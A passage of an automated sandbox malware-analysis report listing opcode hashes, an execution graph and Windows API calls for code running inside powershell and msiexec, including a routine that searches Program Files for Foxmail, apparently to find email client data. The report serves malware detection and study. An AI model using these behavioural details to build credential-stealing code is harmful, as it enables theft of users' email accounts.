                                                                                                        • Instruction Fuzzy Hash: DE41AFB4A00206DFDF24CF59C148BAAB7F6AB8971CF19C4AAE4056B294C771ED41CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $eq$$eq$$eq$$eq
                                                                                                        • API String ID: 0-812946093
                                                                                                        • Opcode ID: fac0aac07c750997e26ad8747ec8a363d7ce0e990b132abdff27364fe98d2e5d
                                                                                                        • Instruction ID: cb332df06e1ac67db32abb54c8d8f25c1b3ffd02e832a3e2b066407d02a035a5
                                                                                                        • Opcode Fuzzy Hash: fac0aac07c750997e26ad8747ec8a363d7ce0e990b132abdff27364fe98d2e5d
                                                                                                        • Instruction Fuzzy Hash: FD2188B175470A9BDB34D5AA9800B67BBDA9BC1719F24843AA406CB3A1DD76C841C321
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$$eq$$eq
                                                                                                        • API String ID: 0-3287427201
                                                                                                        • Opcode ID: b5fd96d20f74aaa335a3fa89d89c0234c98ba03ca5864b87b34da2cc1dbd5580
                                                                                                        • Instruction ID: 4de81ceec84a2c9275470bff42e98f89e252e919a0815b05f8294f65f6459c0f
                                                                                                        • Opcode Fuzzy Hash: b5fd96d20f74aaa335a3fa89d89c0234c98ba03ca5864b87b34da2cc1dbd5580
                                                                                                        • Instruction Fuzzy Hash: BD1148B17142158FDB29DF18DA81A267BF9FF0A13836401AFC151CF2A7C7218801C7D2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2374933543.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7930000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$$eq$$eq
                                                                                                        • API String ID: 0-3287427201
                                                                                                        • Opcode ID: 20f972b5b9c49e8feb4484a1db4cace56283fb61d0fed8bcf65e57ae1084e3eb
                                                                                                        • Instruction ID: f8166ed65c1b6f1113a26564ecfb4d77ee9635c84098ff32950ba5e4d5d993a5
                                                                                                        • Opcode Fuzzy Hash: 20f972b5b9c49e8feb4484a1db4cace56283fb61d0fed8bcf65e57ae1084e3eb
                                                                                                        • Instruction Fuzzy Hash: C601D87175D7DA8FC3375228182006A7F729FC355431905D7D041CF2A7CA2A4D4A83A3

Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.7%
Total number of Nodes: 1658
Total number of Limit Nodes: 1
                                                                                                        execution_graph 7251 228e724e GetProcessHeap 7252 228e284f 7253 228e2882 std::exception::exception 27 API calls 7252->7253 7254 228e285d 7253->7254 7057 228e220c 7058 228e221a dllmain_dispatch 7057->7058 7059 228e2215 7057->7059 7061 228e22b1 7059->7061 7062 228e22c7 7061->7062 7064 228e22d0 7062->7064 7065 228e2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7062->7065 7064->7058 7065->7064 5989 228e508a 5990 228e509c 5989->5990 5991 228e50a2 5989->5991 5993 228e5000 5990->5993 5997 228e500d 5993->5997 5998 228e502a 5993->5998 5994 228e5024 5996 228e571e _free 20 API calls 5994->5996 5995 228e571e _free 20 API calls 5995->5997 5996->5998 5997->5994 5997->5995 5998->5991 7255 228e5348 7256 228e3529 ___vcrt_uninitialize 8 API calls 7255->7256 7257 228e534f 7256->7257 7258 228e7b48 7268 228e8ebf 7258->7268 7262 228e7b55 7281 228e907c 7262->7281 7265 228e7b7f 7266 228e571e _free 20 API calls 7265->7266 7267 228e7b8a 7266->7267 7285 228e8ec8 7268->7285 7270 228e7b50 7271 228e8fdc 7270->7271 7272 228e8fe8 ___DestructExceptionObject 7271->7272 7305 228e5671 RtlEnterCriticalSection 7272->7305 7274 228e905e 7319 228e9073 7274->7319 7275 228e8ff3 7275->7274 7277 228e9032 RtlDeleteCriticalSection 7275->7277 7306 228ea09c 7275->7306 7280 228e571e _free 20 API calls 7277->7280 7278 228e906a _abort 7278->7262 7280->7275 7282 228e7b64 RtlDeleteCriticalSection 7281->7282 7283 228e9092 7281->7283 7282->7262 7282->7265 7283->7282 7284 228e571e _free 20 API calls 7283->7284 7284->7282 7286 228e8ed4 ___DestructExceptionObject 7285->7286 7295 228e5671 RtlEnterCriticalSection 7286->7295 7288 228e8f77 7300 228e8f97 7288->7300 7292 228e8ee3 7292->7288 7294 228e8e78 66 API calls 7292->7294 7296 228e7b94 RtlEnterCriticalSection 7292->7296 7297 228e8f6d 7292->7297 7293 228e8f83 _abort 7293->7270 7294->7292 7295->7292 7296->7292 7303 228e7ba8 
RtlLeaveCriticalSection 7297->7303 7299 228e8f75 7299->7292 7304 228e56b9 RtlLeaveCriticalSection 7300->7304 7302 228e8f9e 7302->7293 7303->7299 7304->7302 7305->7275 7307 228ea0a8 ___DestructExceptionObject 7306->7307 7308 228ea0ce 7307->7308 7309 228ea0b9 7307->7309 7311 228ea0c9 _abort 7308->7311 7322 228e7b94 RtlEnterCriticalSection 7308->7322 7310 228e6368 _free 20 API calls 7309->7310 7313 228ea0be 7310->7313 7311->7275 7315 228e62ac _abort 26 API calls 7313->7315 7314 228ea0ea 7323 228ea026 7314->7323 7315->7311 7317 228ea0f5 7339 228ea112 7317->7339 7587 228e56b9 RtlLeaveCriticalSection 7319->7587 7321 228e907a 7321->7278 7322->7314 7324 228ea048 7323->7324 7325 228ea033 7323->7325 7331 228ea043 7324->7331 7342 228e8e12 7324->7342 7326 228e6368 _free 20 API calls 7325->7326 7328 228ea038 7326->7328 7330 228e62ac _abort 26 API calls 7328->7330 7330->7331 7331->7317 7332 228e907c 20 API calls 7333 228ea064 7332->7333 7348 228e7a5a 7333->7348 7335 228ea06a 7355 228eadce 7335->7355 7338 228e571e _free 20 API calls 7338->7331 7586 228e7ba8 RtlLeaveCriticalSection 7339->7586 7341 228ea11a 7341->7311 7343 228e8e2a 7342->7343 7347 228e8e26 7342->7347 7344 228e7a5a 26 API calls 7343->7344 7343->7347 7345 228e8e4a 7344->7345 7370 228e9a22 7345->7370 7347->7332 7349 228e7a7b 7348->7349 7350 228e7a66 7348->7350 7349->7335 7351 228e6368 _free 20 API calls 7350->7351 7352 228e7a6b 7351->7352 7353 228e62ac _abort 26 API calls 7352->7353 7354 228e7a76 7353->7354 7354->7335 7356 228eaddd 7355->7356 7361 228eadf2 7355->7361 7357 228e6355 __dosmaperr 20 API calls 7356->7357 7360 228eade2 7357->7360 7358 228eae2d 7359 228e6355 __dosmaperr 20 API calls 7358->7359 7362 228eae32 7359->7362 7363 228e6368 _free 20 API calls 7360->7363 7361->7358 7364 228eae19 7361->7364 7365 228e6368 _free 20 API calls 7362->7365 7368 228ea070 7363->7368 7543 228eada6 7364->7543 7367 228eae3a 7365->7367 7369 228e62ac _abort 26 API calls 7367->7369 7368->7331 7368->7338 7369->7368 7371 228e9a2e 
___DestructExceptionObject 6924->6925 6926 228e8bfc 6925->6926 6927 228e8c13 6925->6927 6929 228e6368 _free 20 API calls 6926->6929 6951 228e5671 RtlEnterCriticalSection 6927->6951 6930 228e8c01 6929->6930 6931 228e62ac _abort 26 API calls 6930->6931 6933 228e8c0b _abort 6931->6933 6932 228e8c4b 6959 228e8c72 6932->6959 6933->6916 6936 228e8c1f 6936->6932 6952 228e8b34 6936->6952 6938 228e7318 6937->6938 6939 228e7286 6937->6939 6943 228e731f 6938->6943 6939->6938 6940 228e8be3 27 API calls 6939->6940 6941 228e72af 6940->6941 6941->6938 6942 228e72dd GetFileType 6941->6942 6942->6941 6945 228e7326 6943->6945 6944 228e7369 GetStdHandle 6944->6945 6945->6944 6946 228e73d1 6945->6946 6947 228e737c GetFileType 6945->6947 6946->6917 6947->6945 6963 228e56b9 RtlLeaveCriticalSection 6948->6963 6950 228e7429 6950->6921 6951->6936 6953 228e637b _abort 20 API calls 6952->6953 6958 228e8b46 6953->6958 6954 228e8b53 6955 228e571e _free 20 API calls 6954->6955 6956 228e8ba5 6955->6956 6956->6936 6957 228e5eb7 11 API calls 6957->6958 6958->6954 6958->6957 6962 228e56b9 RtlLeaveCriticalSection 6959->6962 6961 228e8c79 6961->6933 6962->6961 6963->6950 6544 228e3c90 RtlUnwind 6964 228e36d0 6965 228e36e2 6964->6965 6967 228e36f0 @_EH4_CallFilterFunc@8 6964->6967 6966 228e2ada _ValidateLocalCookies 5 API calls 6965->6966 6966->6967 7705 228e5351 7706 228e5360 7705->7706 7710 228e5374 7705->7710 7708 228e571e _free 20 API calls 7706->7708 7706->7710 7707 228e571e _free 20 API calls 7709 228e5386 7707->7709 7708->7710 7711 228e571e _free 20 API calls 7709->7711 7710->7707 7712 228e5399 7711->7712 7713 228e571e _free 20 API calls 7712->7713 7714 228e53aa 7713->7714 7715 228e571e _free 20 API calls 7714->7715 7716 228e53bb 7715->7716 7717 228e506f 7718 228e5081 7717->7718 7720 228e5087 7717->7720 7719 228e5000 20 API calls 7718->7719 7719->7720 6545 228e60ac 6546 228e60dd 6545->6546 6547 228e60b7 6545->6547 6547->6546 6548 228e60c7 FreeLibrary 6547->6548 6548->6547 7109 228e742b 7110 
228e7430 7109->7110 7112 228e7453 7110->7112 7113 228e8bae 7110->7113 7114 228e8bbb 7113->7114 7115 228e8bdd 7113->7115 7116 228e8bc9 RtlDeleteCriticalSection 7114->7116 7117 228e8bd7 7114->7117 7115->7110 7116->7116 7116->7117 7118 228e571e _free 20 API calls 7117->7118 7118->7115 7721 228eac6b 7722 228eac84 __startOneArgErrorHandling 7721->7722 7724 228eacad __startOneArgErrorHandling 7722->7724 7725 228eb2f0 7722->7725 7726 228eb329 __startOneArgErrorHandling 7725->7726 7727 228eb5c1 __raise_exc RaiseException 7726->7727 7728 228eb350 __startOneArgErrorHandling 7726->7728 7727->7728 7729 228eb393 7728->7729 7730 228eb36e 7728->7730 7731 228eb8b2 __startOneArgErrorHandling 20 API calls 7729->7731 7736 228eb8e1 7730->7736 7733 228eb38e __startOneArgErrorHandling 7731->7733 7734 228e2ada _ValidateLocalCookies 5 API calls 7733->7734 7735 228eb3b7 7734->7735 7735->7724 7737 228eb8f0 7736->7737 7738 228eb90f __startOneArgErrorHandling 7737->7738 7739 228eb964 __startOneArgErrorHandling 7737->7739 7740 228e78a3 __startOneArgErrorHandling 5 API calls 7738->7740 7741 228eb8b2 __startOneArgErrorHandling 20 API calls 7739->7741 7742 228eb950 7740->7742 7744 228eb95d 7741->7744 7743 228eb8b2 __startOneArgErrorHandling 20 API calls 7742->7743 7742->7744 7743->7744 7744->7733 6549 228ec7a7 6550 228ec7be 6549->6550 6551 228ec80d 6549->6551 6550->6551 6558 228ec7e6 GetModuleHandleA 6550->6558 6552 228ec835 GetModuleHandleA 6551->6552 6553 228ec872 6551->6553 6556 228ec85f GetProcAddress 6551->6556 6552->6551 6556->6551 6559 228ec7ef 6558->6559 6565 228ec80d 6558->6565 6567 228ec803 GetProcAddress 6559->6567 6562 228ec835 GetModuleHandleA 6562->6565 6563 228ec872 6565->6562 6565->6563 6566 228ec85f GetProcAddress 6565->6566 6566->6565 6568 228ec80d 6567->6568 6569 228ec835 GetModuleHandleA 6568->6569 6570 228ec872 6568->6570 6571 228ec85f GetProcAddress 6568->6571 6569->6568 6571->6568 6572 228e81a0 6573 228e81d9 6572->6573 6574 228e81dd 6573->6574 6585 228e8205 6573->6585 6575 
228e6368 _free 20 API calls 6574->6575 6576 228e81e2 6575->6576 6578 228e62ac _abort 26 API calls 6576->6578 6577 228e8529 6579 228e2ada _ValidateLocalCookies 5 API calls 6577->6579 6580 228e81ed 6578->6580 6581 228e8536 6579->6581 6582 228e2ada _ValidateLocalCookies 5 API calls 6580->6582 6583 228e81f9 6582->6583 6585->6577 6586 228e80c0 6585->6586 6589 228e80db 6586->6589 6587 228e2ada _ValidateLocalCookies 5 API calls 6588 228e8152 6587->6588 6588->6585 6589->6587 6968 228ea1e0 6971 228ea1fe 6968->6971 6970 228ea1f6 6975 228ea203 6971->6975 6974 228ea298 6974->6970 6975->6974 6976 228eaa53 6975->6976 6977 228eaa70 RtlDecodePointer 6976->6977 6978 228eaa80 6976->6978 6977->6978 6979 228eab0d 6978->6979 6982 228eab02 6978->6982 6984 228eaab7 6978->6984 6979->6982 6983 228e6368 _free 20 API calls 6979->6983 6980 228e2ada _ValidateLocalCookies 5 API calls 6981 228ea42f 6980->6981 6981->6970 6982->6980 6983->6982 6984->6982 6985 228e6368 _free 20 API calls 6984->6985 6985->6982 7745 228e7260 GetStartupInfoW 7746 228e7286 7745->7746 7748 228e7318 7745->7748 7747 228e8be3 27 API calls 7746->7747 7746->7748 7749 228e72af 7747->7749 7749->7748 7750 228e72dd GetFileType 7749->7750 7750->7749 6590 228e21a1 ___scrt_dllmain_exception_filter 7751 228e9d61 7752 228e9d81 7751->7752 7755 228e9db8 7752->7755 7754 228e9dab 7756 228e9dbf 7755->7756 7757 228e9ddf 7756->7757 7758 228e9e20 7756->7758 7759 228ea90e 7757->7759 7762 228eaa17 21 API calls 7757->7762 7758->7759 7760 228eaa17 21 API calls 7758->7760 7759->7754 7761 228e9e6e 7760->7761 7761->7754 7763 228ea93e 7762->7763 7763->7754 6591 228e67bf 6596 228e67f4 6591->6596 6594 228e67db 6595 228e571e _free 20 API calls 6595->6594 6597 228e6806 6596->6597 6606 228e67cd 6596->6606 6598 228e680b 6597->6598 6599 228e6836 6597->6599 6600 228e637b _abort 20 API calls 6598->6600 6599->6606 6607 228e71d6 6599->6607 6602 228e6814 6600->6602 6603 228e571e _free 20 API calls 6602->6603 6603->6606 6604 228e6851 6605 228e571e _free 20 API 
calls 6604->6605 6605->6606 6606->6594 6606->6595 6608 228e71e1 6607->6608 6609 228e7209 6608->6609 6611 228e71fa 6608->6611 6610 228e7218 6609->6610 6616 228e8a98 6609->6616 6623 228e8acb 6610->6623 6612 228e6368 _free 20 API calls 6611->6612 6614 228e71ff ___scrt_fastfail 6612->6614 6614->6604 6617 228e8ab8 RtlSizeHeap 6616->6617 6618 228e8aa3 6616->6618 6617->6610 6619 228e6368 _free 20 API calls 6618->6619 6620 228e8aa8 6619->6620 6621 228e62ac _abort 26 API calls 6620->6621 6622 228e8ab3 6621->6622 6622->6610 6624 228e8ad8 6623->6624 6625 228e8ae3 6623->6625 6626 228e56d0 21 API calls 6624->6626 6627 228e8aeb 6625->6627 6633 228e8af4 _abort 6625->6633 6632 228e8ae0 6626->6632 6630 228e571e _free 20 API calls 6627->6630 6628 228e8b1e RtlReAllocateHeap 6628->6632 6628->6633 6629 228e8af9 6631 228e6368 _free 20 API calls 6629->6631 6630->6632 6631->6632 6632->6614 6633->6628 6633->6629 6634 228e474f _abort 7 API calls 6633->6634 6634->6633 6986 228e5bff 6994 228e5d5c 6986->6994 6989 228e5c13 6990 228e5b7a __dosmaperr 20 API calls 6991 228e5c1b 6990->6991 6992 228e5c28 6991->6992 7001 228e5c2b 6991->7001 6995 228e5c45 _abort 5 API calls 6994->6995 6996 228e5d83 6995->6996 6997 228e5d9b TlsAlloc 6996->6997 7000 228e5d8c 6996->7000 6997->7000 6998 228e2ada _ValidateLocalCookies 5 API calls 6999 228e5c09 6998->6999 6999->6989 6999->6990 7000->6998 7002 228e5c35 7001->7002 7003 228e5c3b 7001->7003 7005 228e5db2 7002->7005 7003->6989 7006 228e5c45 _abort 5 API calls 7005->7006 7007 228e5dd9 7006->7007 7008 228e5df1 TlsFree 7007->7008 7009 228e5de5 7007->7009 7008->7009 7010 228e2ada _ValidateLocalCookies 5 API calls 7009->7010 7011 228e5e02 7010->7011 7011->7003 7119 228e1f3f 7120 228e1f4b ___DestructExceptionObject 7119->7120 7137 228e247c 7120->7137 7122 228e1f52 7123 228e1f7c 7122->7123 7124 228e2041 7122->7124 7131 228e1f57 ___scrt_is_nonwritable_in_current_image 7122->7131 7148 228e23de 7123->7148 7160 228e2639 IsProcessorFeaturePresent 7124->7160 7127 228e2048 
7128 228e1f8b __RTC_Initialize 7128->7131 7151 228e22fc RtlInitializeSListHead 7128->7151 7130 228e1f99 ___scrt_initialize_default_local_stdio_options 7152 228e46c5 7130->7152 7135 228e1fb8 7135->7131 7136 228e4669 _abort 5 API calls 7135->7136 7136->7131 7138 228e2485 7137->7138 7164 228e2933 IsProcessorFeaturePresent 7138->7164 7142 228e2496 7143 228e249a 7142->7143 7175 228e53c8 7142->7175 7143->7122 7146 228e24b1 7146->7122 7231 228e24b5 7148->7231 7150 228e23e5 7150->7128 7151->7130 7153 228e46dc 7152->7153 7154 228e2ada _ValidateLocalCookies 5 API calls 7153->7154 7155 228e1fad 7154->7155 7155->7131 7156 228e23b3 7155->7156 7157 228e23b8 ___scrt_release_startup_lock 7156->7157 7158 228e2933 ___isa_available_init IsProcessorFeaturePresent 7157->7158 7159 228e23c1 7157->7159 7158->7159 7159->7135 7161 228e264e ___scrt_fastfail 7160->7161 7162 228e26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7161->7162 7163 228e2744 ___scrt_fastfail 7162->7163 7163->7127 7165 228e2491 7164->7165 7166 228e34ea 7165->7166 7167 228e34ef ___vcrt_initialize_winapi_thunks 7166->7167 7186 228e3936 7167->7186 7170 228e34fd 7170->7142 7172 228e3505 7173 228e3510 7172->7173 7200 228e3972 7172->7200 7173->7142 7223 228e7457 7175->7223 7178 228e3529 7179 228e3543 7178->7179 7180 228e3532 7178->7180 7179->7143 7181 228e391b ___vcrt_uninitialize_ptd 6 API calls 7180->7181 7182 228e3537 7181->7182 7183 228e3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7182->7183 7184 228e353c 7183->7184 7227 228e3c50 7184->7227 7187 228e393f 7186->7187 7189 228e3968 7187->7189 7191 228e34f9 7187->7191 7204 228e3be0 7187->7204 7190 228e3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7189->7190 7190->7191 7191->7170 7192 228e38e8 7191->7192 7209 228e3af1 7192->7209 7195 228e3ba2 ___vcrt_FlsSetValue 6 API calls 7196 228e390b 7195->7196 7197 228e3918 7196->7197 7214 228e391b 7196->7214 7197->7172 7199 228e38fd 7199->7172 7201 228e397d 7200->7201 7203 228e399c 
7200->7203 7202 228e3987 RtlDeleteCriticalSection 7201->7202 7202->7202 7202->7203 7203->7170 7205 228e3a82 try_get_function 5 API calls 7204->7205 7206 228e3bfa 7205->7206 7207 228e3c18 InitializeCriticalSectionAndSpinCount 7206->7207 7208 228e3c03 7206->7208 7207->7208 7208->7187 7210 228e3a82 try_get_function 5 API calls 7209->7210 7211 228e3b0b 7210->7211 7212 228e3b24 TlsAlloc 7211->7212 7213 228e38f2 7211->7213 7213->7195 7213->7199 7215 228e3925 7214->7215 7216 228e392b 7214->7216 7218 228e3b2c 7215->7218 7216->7199 7219 228e3a82 try_get_function 5 API calls 7218->7219 7220 228e3b46 7219->7220 7221 228e3b5e TlsFree 7220->7221 7222 228e3b52 7220->7222 7221->7222 7222->7216 7226 228e7470 7223->7226 7224 228e2ada _ValidateLocalCookies 5 API calls 7225 228e24a3 7224->7225 7225->7146 7225->7178 7226->7224 7228 228e3c59 7227->7228 7230 228e3c7f 7227->7230 7229 228e3c69 FreeLibrary 7228->7229 7228->7230 7229->7228 7230->7179 7232 228e24c4 7231->7232 7233 228e24c8 7231->7233 7232->7150 7234 228e2639 ___scrt_fastfail 4 API calls 7233->7234 7236 228e24d5 ___scrt_release_startup_lock 7233->7236 7235 228e2559 7234->7235 7236->7150 7237 228e543d 7238 228e5440 7237->7238 7239 228e55a8 _abort 38 API calls 7238->7239 7240 228e544c 7239->7240 6635 228e3eb3 6636 228e5411 38 API calls 6635->6636 6637 228e3ebb 6636->6637 7012 228e63f0 7013 228e6400 7012->7013 7022 228e6416 7012->7022 7014 228e6368 _free 20 API calls 7013->7014 7015 228e6405 7014->7015 7016 228e62ac _abort 26 API calls 7015->7016 7018 228e640f 7016->7018 7017 228e4e76 20 API calls 7023 228e64e5 7017->7023 7019 228e6480 7019->7017 7019->7019 7021 228e64ee 7024 228e571e _free 20 API calls 7021->7024 7022->7019 7025 228e6561 7022->7025 7031 228e6580 7022->7031 7023->7021 7028 228e6573 7023->7028 7042 228e85eb 7023->7042 7024->7025 7051 228e679a 7025->7051 7029 228e62bc _abort 11 API calls 7028->7029 7030 228e657f 7029->7030 7032 228e658c 7031->7032 7032->7032 7033 228e637b _abort 20 API calls 7032->7033 7034 
228e65ba 7033->7034 7035 228e85eb 26 API calls 7034->7035 7036 228e65e6 7035->7036 7037 228e62bc _abort 11 API calls 7036->7037 7038 228e6615 ___scrt_fastfail 7037->7038 7039 228e66b6 FindFirstFileExA 7038->7039 7040 228e6705 7039->7040 7041 228e6580 26 API calls 7040->7041 7045 228e853a 7042->7045 7043 228e854f 7044 228e8554 7043->7044 7046 228e6368 _free 20 API calls 7043->7046 7044->7023 7045->7043 7045->7044 7049 228e858b 7045->7049 7047 228e857a 7046->7047 7048 228e62ac _abort 26 API calls 7047->7048 7048->7044 7049->7044 7050 228e6368 _free 20 API calls 7049->7050 7050->7047 7052 228e67a4 7051->7052 7053 228e67b4 7052->7053 7054 228e571e _free 20 API calls 7052->7054 7055 228e571e _free 20 API calls 7053->7055 7054->7052 7056 228e67bb 7055->7056 7056->7018 7241 228e5630 7242 228e563b 7241->7242 7243 228e5eb7 11 API calls 7242->7243 7244 228e5664 7242->7244 7245 228e5660 7242->7245 7243->7242 7247 228e5688 7244->7247 7248 228e56b4 7247->7248 7249 228e5695 7247->7249 7248->7245 7250 228e569f RtlDeleteCriticalSection 7249->7250 7250->7248 7250->7250 7764 228e3370 7775 228e3330 7764->7775 7776 228e334f 7775->7776 7777 228e3342 7775->7777 7778 228e2ada _ValidateLocalCookies 5 API calls 7777->7778 7778->7776 7779 228e9e71 7780 228e9e95 7779->7780 7781 228e9eae 7780->7781 7784 228eac6b __startOneArgErrorHandling 7780->7784 7782 228eaa53 21 API calls 7781->7782 7785 228e9ef8 7781->7785 7782->7785 7783 228eacad __startOneArgErrorHandling 7784->7783 7786 228eb2f0 21 API calls 7784->7786 7786->7783

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 228E1137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 228E11D0
• FindClose.KERNEL32(00000000), ref: 228E11DB
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: a84c53ce2986e70f438908003225df536cf7bc40b61c9246bfc1d54d5ecd16f7
• Instruction ID: 793a957c4b0a9584553af1d1a8e70354beaf8b3b74e6c1faa887f1d7b9c176af
• Opcode Fuzzy Hash: a84c53ce2986e70f438908003225df536cf7bc40b61c9246bfc1d54d5ecd16f7
• Instruction Fuzzy Hash: 90219E76544308ABD724EB64DC48F9B7B9CEF85314F040D2ABA9DD31E0EB74DA088796

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 228E1434
  • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 228E1137
  • Part of subcall function 228E10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1151
  • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E115C
  • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E116D
  • Part of subcall function 228E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 228E117C
  • Part of subcall function 228E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 228E1193
  • Part of subcall function 228E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 228E11D0
  • Part of subcall function 228E10F1: FindClose.KERNEL32(00000000), ref: 228E11DB
• lstrlenW.KERNEL32(?), ref: 228E14C5
• lstrlenW.KERNEL32(?), ref: 228E14E0
• lstrlenW.KERNEL32(?,?), ref: 228E150F
• lstrcatW.KERNEL32(00000000), ref: 228E1521
• lstrlenW.KERNEL32(?,?), ref: 228E1547
• lstrcatW.KERNEL32(00000000), ref: 228E1553
• lstrlenW.KERNEL32(?,?), ref: 228E1579
• lstrcatW.KERNEL32(00000000), ref: 228E1585
• lstrlenW.KERNEL32(?,?), ref: 228E15AB
• lstrcatW.KERNEL32(00000000), ref: 228E15B7
Strings
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 69fe64d053dc355b212ddb433caf1c329b7dbfef38835c99c678a58bb3ac2dd1
• Instruction ID: fed009b314621e26554e82d108169c19c1fa9c406179fba4b442f8d3435567e7
• Opcode Fuzzy Hash: 69fe64d053dc355b212ddb433caf1c329b7dbfef38835c99c678a58bb3ac2dd1
• Instruction Fuzzy Hash: D281D175A10318E9EB20CBA4DC85FEE733DEF85700F0005A6F509E71A0EAB19A84CB95
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 228E61DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 228E61E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 228E61F1
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: e9cfcb510b362faa70dfe210450ed5b157790cac2153b61e400b346818f5e97b
• Instruction ID: e2fb54a26eeae0de3fdf7a8f7a8c9cf07442ce0d0815f8bb7ef75f9051b06a05
• Opcode Fuzzy Hash: e9cfcb510b362faa70dfe210450ed5b157790cac2153b61e400b346818f5e97b
• Instruction Fuzzy Hash: CD31C274941328DBCB61DF28D988B8DBBB8AF09310F5041DAF81DA6291E7749B85CF45
APIs
• GetCurrentProcess.KERNEL32(?,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000,?,228E2082,228F2108,0000000C,228E1F3A,?), ref: 228E4AD5
• TerminateProcess.KERNEL32(00000000,?,228E4A8A,?,228F2238,0000000C,228E4BBD,00000000,00000000,?,228E2082,228F2108,0000000C,228E1F3A,?), ref: 228E4ADC
• ExitProcess.KERNEL32 ref: 228E4AEE
Memory Dump Source
• Source File: 00000008.00000002.4526130798.00000000228E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 228E0000, based on PE: true
• Associated: 00000008.00000002.4526106420.00000000228E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4526130798.00000000228F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_228e0000_msiexec.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: d79e8fef8d39c9a547b0b8b7b50a6a292a2cfe2d9d0f4795d48a5bba9a335418
• Instruction ID: 3667b12466a16413b42d0c81bc72434049a92b411ea88c578c25c47fbff07018
• Opcode Fuzzy Hash: d79e8fef8d39c9a547b0b8b7b50a6a292a2cfe2d9d0f4795d48a5bba9a335418
